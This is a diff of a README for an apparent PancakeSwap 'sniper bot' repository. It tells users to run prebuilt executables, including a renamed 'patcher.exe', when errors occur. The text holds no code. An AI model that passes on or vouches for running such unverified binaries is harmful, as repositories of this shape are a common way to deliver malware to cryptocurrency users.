Kocarus/Pancakeswap-sniperbot-full/README.md

 3. Run "Sniping bot 21-5 Final-1152-utc.exe"

 - Make sure configfile.py and bot.exe are in the same folder.
-- If error occurs, you can run the bot by starting "patcher_v3.exe" and closing the command line after the bot launches
+- If error occurs, you can run the bot by starting "patcher.exe" and closing the command line after the bot launches

 4. Edit settings according to choice.